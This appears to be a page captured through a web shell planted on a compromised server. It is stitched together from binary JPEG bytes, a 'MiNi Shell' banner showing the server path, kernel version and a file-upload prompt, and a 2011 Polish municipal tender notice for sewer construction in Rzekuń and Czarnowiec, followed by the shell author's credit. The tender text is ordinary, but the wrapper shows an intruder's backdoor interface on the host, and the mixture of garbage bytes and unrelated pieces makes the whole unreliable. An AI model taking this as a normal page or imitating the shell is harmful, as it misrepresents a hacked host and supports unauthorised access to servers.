JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/50720-N-2011.html

<p class="kh_header"><b>Rzekuń: Budowa sieci kanalizacyjnej z przyłączami
w miejscowości Rzekuń i Czarnowiec-III etap</b><br>
<b>Numer ogłoszenia: 50720 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rzekuń , ul. Kościuszki 33, 07-411 Rzekuń, woj. mazowieckie, tel. 029 7617301 w. 47, faks 029 7617302.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacyjnej z przyłączami
w miejscowości Rzekuń i Czarnowiec-III etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych przy realizacji zadania pn.: Budowa sieci kanalizacyjnej z przyłączami w msc. Rzekuń i Czarnowiec - etap III w ramach pożyczki z WFOŚiGW.

2. Oznaczenie wg Wspólnego Słownika Zamówień:
45232400-6 - Roboty budowlane w zakresie kanałów ściekowych
45232423-3 - Roboty budowlane w zakresie przepompowni ścieków

3. Zadanie obejmuje:
Wykonanie kanalizacji sanitarnej grawitacyjno-ciśnieniowej o łącznej długości 5 189,0 m z przyłączami do studzienek rewizyjnych o łącznej długości 987,0 m i ilości 115 szt.
a) Zakres etapu obejmuje budowę kanalizacji:
- ul. Kościuszki od S-23 do S-49,
- ul. Cicha od S-292 do S-481,
- ul. Złota od S-37 do S-190,
- ul. Sadowa od S-48 do S-280,
- ul. Srebrna od S-193 do P-4, S-36 do P-4, P-4 do S-38 w ul. Kościuszki,
- ul. Platynowa od S-207 do P-5, S-40 do P-5, P-5 do S-50 w ul. Kościuszki,
- działka nr 751, 752 od S-274 do S-253, od S-273 do 239
- działka nr 595/1 od S-263 do P-7 do S-481 w ul. Cichej,
- działka nr 667 od S-219 do S-45
- działka nr 602/1 od S-43 do S-228
- działka nr 604/2 od S-39 do S-223
- działka 179/3 od S-28 do S-192
- działka 180/4 od S-191 do P-3 do S-33 w ul. Kościuszki
- działka nr 607/7 do S-31 do S-185
- działka nr 607/4 od S-29 do S-183
- działka nr 174/4 do S-49 do S-242
b) Zakres etapu obejmuje budowę przyłączy kanalizacyjnych do działek:
- 608, 180/1, 180/2, 179/1, 607/3, 607/10, 607/11, 607/5, 179/2, 178/15, 178/14, 178/21, 178/13, 178/12, 178/19, 178/11, 178/18, 178/10, 178/5, 178/4, 178/3, 178/17, 178/1, 178/2, 617, 605/29, 605/5, 605/7, 178/8, 177/27, 177/14, 177/26, 177/13, 177/25, 177/12, 177/24, 177/11, 177/23, 177/10, 177/22, 177/9, 177/8, 177/8, 177/21, 177/7, 177/20, 177/19, 177/6, 177/18, 177/5, 176/8, 176/3, 605/26, 605/9, 605/11, 604/2, 603/1, 603/2, 602/2, 602/3, 602/4, 602/5, 601, 600, 176/1, 175, 176/2, 598, 597/2, 597/3, 597/4, 597/5, 597/6, 749, 591/2, 593, 561, 562/1, 562/2, 739, 740, 570, 595/8, 595/7, 595/3, 595/2, 750, 748, 747, 746, 745, 744, 743,
742, 741, 559, 621/2, 607/4, 607/8, 607/9, 605/17, 605/18, 605/15, 605/20, 605/13, 605/22, 605/24, 591/3, 595/6.

4. W ramach zadania należy wykonać:
a) Sieć kanalizacji sanitarnej grawitacyjnej z przyłączami.
-Rury PVC (lite) typ S o śr. 200 mm - 4 043,0 m
-Rury PVC (lite) typ S o śr. 160 mm - 987,0 m
-Studnie kanalizacyjne z tworzyw sztucznych o śr. 1000 mm - 56 kpl.
-Studnie kanalizacyjne z tworzyw sztucznych o śr. 600 mm - 92 kpl.
-Studnie kanalizacyjne z tworzyw sztucznych o śr. 400 mm - 114 kpl.
-Odtworzenie nawierzchni i poboczy.
b) Sieć kanalizacji sanitarnej ciśnieniowej.
-Rury PE100 SDR 17 o średnicy 110 mm o długości - 1 035,0 m,
-Rury PE100 SDR 17 o średnicy 90 mm o długości - 111,0 m,
-Montaż kompletnych przepompowni ścieków z wyposażeniem - 4 szt. opis wg.
załącznika nr 7 do SIWZ
-Montaż monitoringu pracy przepompowni z modułem GPRS - opis wg. załącznika nr
7 do SIWZ
-Opracowanie dokumentacji technicznej i na jej podstawie przyłączy energetycznych
zasilających przepompownie P3, P4, P5, P7. Warunki przyłączenia do sieci energetycznej dostarczy Zamawiający.
-Odtworzenie nawierzchni i poboczy.

5. W ramach zamówienia Wykonawca będzie zobowiązany również do:
-udzielenia gwarancji na wykonane roboty budowlane na okres 60 miesięcy, licząc od
dnia końcowego odbioru robót,
-prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi
Wykonania i Odbioru Robót Budowlanych,
-wykonania na własny koszt wytyczenia trasy sieci i przyłączy, oraz obsługi
geodezyjnej,
-wykonania na własny koszt inwentaryzacji geodezyjnej powykonawczej w 3
egzemplarzach,
-przedstawienia dokumentacji techniczno - ruchowej (DTR) przepompowni ścieków,
-przedstawienia aprobat technicznych, certyfikatów, świadectw dopuszczalności na
wbudowane urządzenia i materiały budowlane
-przedstawienia protokołów badań i sprawdzeń urządzeń z rozruchu dopuszczających
do eksploatacji,
-przedstawienia protokołów badań wszystkich przewodów (grawitacyjnych, tłocznych i przyłączy) w zakresie szczelności na eksfiltrację ścieków do gruntu i filtrację wód
gruntowych do kanału, badań gruntu (wskaźnik zagęszczenia) i instalacji
elektrycznych,
-wykonania inspekcji telewizyjnej sieci kanalizacji sanitarnej po jej wykonaniu wraz z
raportem inspekcji, przy czym inspekcja ma potwierdzić prawidłowe wykonanie
rurociągu.
-sporządzenia wykazu wykonanych przykanalików, zawierającego: Lp.; Nazwisko i
imię właściciela posesji; nr domu; nr działki; długość przyłącza, rzędne studzienki
rewizyjnej, podpis właściciela,
-poniesienia kosztów zajęcia pasa drogowego i opracowania projektu czasowej
organizacji ruchu. Długość sieci w pasie drogi powiatowej nr 2550 W (ul. Kościuszki)
wynosi ok. 1180,0 m, nr 2568 W (ul. Ogrodowa) wynosi ok. 95 m, pozostała część
sieci zawiera się w pasach dróg gminnych.
-dokonania napraw wszelkich zniszczeń powstałych w trakcie realizacji zamówienia na
własny koszt, swoim staraniem i w ramach niniejszego zamówienia,
-odtworzenia uszkodzonych lub zniszczonych punktów geodezyjnych na własny koszt.
-zamówienie powinno być zrealizowane zgodnie z obowiązującymi przepisami
techniczno - budowlanymi, normami i wytycznymi, z materiałów dostarczonych przez
Wykonawcę, odpowiadających wymogom wyrobów dopuszczonych do obrotu i
stosowania w budownictwie, określonych w ustawie Prawo Budowlane tj.
posiadających certyfikat,
-Zamawiający nie dopuszcza odstępstw od dokumentacji projektowej w wykonawstwie i technologii,
-zapewnienia i utrzymania bezpieczeństwa terenu budowy oraz robót poza placem
budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób
nieupoważnionych zapewniając bezpieczne dojścia i dojazdy do istniejących posesji.
-ewentualne zastosowane nazwy producentów w dokumentacji przetargowej służą
doprecyzowaniu przedmiotu zamówienia. Wszystkie parametry w dokumentacji
projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych
określone są na poziomie minimalnym, tzn. Zamawiający dopuszcza zastosowanie
materiałów o parametrach równoważnych czyli co najmniej takich jak podano w
przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót lecz nie
gorszych.
-Zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej i zebranie
niezbędnych informacji do sporządzenia oferty.

6. Szczegółowy opis i zakres robót określają:
-Specyfikacja techniczna wykonania i odbioru robót budowlanych,
-Przedmiar robót,
-Dokumentacja projektowa,
-Specyfikacja Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.23-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 32 000,00 zł (słownie złotych:
trzydzieści dwa tysiące).
2. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert.
3. Dowód wniesienia wadium należy dołączyć do składanej oferty.
4. Wadium może być wnoszone w jednej lub kilku następujących formach:
-pieniądzu,
-poręczeniach bankowych,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000 r. O utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i
732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620)
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto banku Bank
Spółdzielczy nr 14 8922 0009 0002 4673 2000 0010.
6. Warunki zwrotu wadium i utraty wadium reguluje art. 46 - Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy który ma charakter pomocniczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy i określa następujące warunki takich zmian:

1. Termin realizacji przedmiotu umowy w przypadku:
a) wystąpienia okoliczności niezależnych od Wykonawcy (w szczególności złych
warunków atmosferycznych) przy zachowaniu przez niego należytej staranności,
skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia.
b) nie przekazania Wykonawcy przez Zamawiającego dokumentów budowy, do których
przekazania Zamawiający był zobowiązany.
c) wstrzymania przez Zamawiającego robót nie wynikających z okoliczności leżących po stronie Wykonawcy. Nie dotyczy okoliczności wstrzymania robót przez inspektora
nadzoru Zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych
przez Wykonawcę.
d) konieczności wykonania przez Zamawiającego korekty projektu dla usunięcia wad
dostarczonej dokumentacji.
e) W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionego w literach a - d, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych
okoliczności.

2. Wysokość ceny ryczałtowej brutto w przypadku zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia.
W trakcie realizacji przedmiotu umowy, strony dokonają odpowiedniej zmiany
wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.

3. Forma zabezpieczenia należytego wykonania umowy - zgodnie z art. 149 ust 1 Pzp.

4. Rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenie terminu udzielonej
gwarancji w przypadku zaproponowania takiego rozwiązania przez Wykonawcę.

5. Zmiana sposobu rozliczania za wykonane roboty w przypadku:
a) zmiany umowy w zakresie terminu realizacji przedmiotu zamówienia;
b) za zgodą Wykonawcy zmiana terminu płatności w przypadku, gdy Zamawiający nie
otrzymał w przewidzianym przez siebie czasie kredytu, który ma posłużyć jako zapłata
za wykonanie robót.

6. Zmiana kierownika budowy, kierowników robót bądź inspektorów nadzoru w przypadku śmierci, choroby, rezygnacji, zwolnienia pracownika lub innych zdarzeń losowych, dotyczących w/w osób. W przypadku zmiany nowy kierownik budowy bądź robót musi spełniać wymagania określone w SIWZ dla tych osób.

Powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić
zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzekun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rzekuniu
07-411 Rzekuń, ul. Kościuszki 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2011 godzina 10:00, miejsce: Urząd Gminy w Rzekuniu
ul. Kościuszki 33
07-411 Rzekuń
pokój nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com